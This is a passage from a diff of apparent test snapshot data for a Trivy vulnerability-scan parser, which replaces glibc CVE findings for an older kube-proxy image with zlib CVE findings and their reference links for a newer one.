"https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://github.com/curl/curl/issues/9271", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", - ], - }, - "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://support.apple.com/kb/HT213493", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://support.apple.com/kb/HT213494", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://ubuntu.com/security/notices/USN-5570-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://ubuntu.com/security/notices/USN-5570-2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://ubuntu.com/security/notices/USN-5573-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://github.com/madler/zlib/issues/605", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", - "references": [ { "type": "URL", - "value": 